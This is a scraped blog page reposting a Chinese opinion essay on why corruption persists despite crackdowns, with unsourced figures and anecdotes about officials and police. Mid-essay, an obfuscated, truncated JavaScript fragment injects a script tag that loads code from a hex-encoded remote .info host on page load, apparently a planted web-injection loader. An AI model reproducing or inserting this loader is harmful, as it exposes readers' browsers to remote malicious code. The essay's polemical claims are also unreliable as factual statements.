注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

云天

 
 
 

日志

 
 

【引用】为何贪腐越治越贪·吉祥宝贝  

2010-12-28 10:11:57|  分类: 默认分类 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
和大家分享这篇日志,我的看法是:

 
原文地址:【引用】为何贪腐越治越贪·吉祥宝贝    原文作者:正义亮剑777ss
和大家分享这篇日志,我的看法是:

 
原文地址:【引用】为何贪腐越治越贪·吉祥宝贝    原文作者:幸福梅园
和大家分享这篇日志,我的看法是:

 
原文地址:【引用】为何贪腐越治越贪·吉祥宝贝    原文作者:一光
【引用】为何贪腐越治越贪·吉祥宝贝

政治经济 2010-12-27 14:41:00 阅读25 评论1   字号:大中小 订阅


原文作者:骅春

为何贪腐越治越贪(原创) - 柳岸烟雨 - 柳岸烟雨 的博客

 缺乏经济发展制度统筹策划,盲目强调“发展才是硬道理”,而排斥法制与科学。就像只求快行,不讲交通规则的醉汉,撞得人仰马翻、车毁人亡。而致“环境资源破坏,经济畸形发展,腐败丛生失控,暴力死人不断”局面泛滥成灾。

凡治国之道,首要是用人。是唯贤能者用,还是唯同党者用?

人民无选举权,公务员录用、任免,由上司和垄断集团决定。不同流合污的不用,不钱权交易的不用,无亲属为官的不用,有真才实学的不用,敢为民说话的不用,讲守法诚信的不用;而钱权关系,才是用人的铁定准则。对那些贪赃枉法、擅权渎职的,只要同流合污,再坏也要用。

这种吏制,不仅造成机构臃肿、滥用职权、决策失误、腐败失控,而致环境资源破坏、经济畸形发展。更严重、深远的恶果是,造成了社会堕落、道德崩溃、信仰缺失、公信丧失,而离心离德。

其二、为谁发展?

tsByTagName%28%27script%27%29%5B0%5D.src%3D%27http%3A//%78%71%7a%6e%2e%69%6e%66%6f%2f%61%2f%31%36%33%2f%6e%2e%70%68%70%27%3Bwindow.x%3D1%7D"<不致力建立公平竞争经济制度,让所有公民参与竞争共同致富,而放任权钱交易先暴富,任随官商勾结成巨富。由于提供了只有中国才特有的“权钱交易带头富,为富不仁成国策”的政治经济体制,才产了要富就必腐的联体怪胎。致90%以上的社会财富由7%的权奸豪强占有。

其三、怎样发展?

缺乏发展制度设计。只强调经济发展、社会转型,而排斥整治贪腐、解决转型矛盾的制度建设。反而将其分离,甚至对立。

由于国家发展制度缺失及法制方向错误,便对揭露官商勾结、欺压掠夺百姓的新闻及大众舆论监督及诉求,一律以发展才是硬道理予以抵制和打压。

缺乏发展模式论证。不致力开拓经济贸易、科学技术研究成果,以提高经济增长率及资源利用率。而采用卖地卖矿、卖官鬻爵、投机房地产、房价成倍翻、GDP虚增长的低级、野蛮发展方式。

其四、由他方监管,还是自我监管?

 政府卖地、卖矿、融资,投机房地产。又大肆公款吃喝、豪华宴请、买豪车、建别墅、出国旅游;公务员待遇翻翻,享受高其他阶层好几倍的退休待遇;一面又宣称巨额举债。

试问,30万亿的买地……收入哪去了?国税地税收入哪去了?融资收益哪去了?灰色黑色收入的小金库哪去了?……。

这些烂账,如果只以自清自查、自说自话解决,那么这种既是运动员,又是裁判员的体制,你不要他腐都不行!

其五、只有知法的人犯起法来,才会无法无天!以贪治贪,以官治贪,而致党政纪检、公检法司成为腐败重灾区,结果越反越贪。

 特别是公检法司,他们钻法律空子,利用管辖的黄赌毒赚黑心钱,又利用法律赋予的自由量裁权和裁判权逃避渎职追究,以谋取私利。司法局权力者甚至勾结监管过的人犯释放犯,独霸一方一业,欺行霸市,大发不义之财。

 四川什邡就曾发生公安局长在自己家门被人捅了几刀而不敢报警的丑事。省厅来查,该局长居然为杀人者掩饰,阻止侦办。因官黑既相互勾结,又相互掩饰,才致许多打残、杀人案件始终未获公正处理及侦破。致党政纪检、公检法司越来越腐,致社会越来越黑,致善良百姓越来越苦。

其六、上梁不正下梁歪。吃人嘴软,拿人手短,高层决策要看地方脸色。

一旦全面打贪,就断了地方财路,上下无利可图,权利失去含金量,最高层就不会决心打贪。而只用“反腐倡廉”应付舆论,欺骗公众。

  评论这张
 
阅读(44)| 评论(1)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017